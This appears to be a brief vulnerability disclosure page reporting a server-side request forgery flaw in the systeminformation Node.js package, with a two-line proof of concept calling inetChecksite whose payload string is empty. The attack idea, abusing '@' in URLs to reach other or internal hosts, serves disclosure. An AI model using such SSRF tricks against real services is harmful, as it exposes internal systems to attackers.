Server-Side Request Forgery (SSRF) in sebhildebrandt/systeminformation


Reported on

Feb 18th 2021


systeminformation package is vulnerable to Server-side request forgery. It allows attackers to abuse of @ to make requests to a different domain or possibility to applications that are not publicly exposed through

Proof of Concept

const si = require('systeminformation');
si.inetChecksite("").then(a => { console.log(a) });
to join this conversation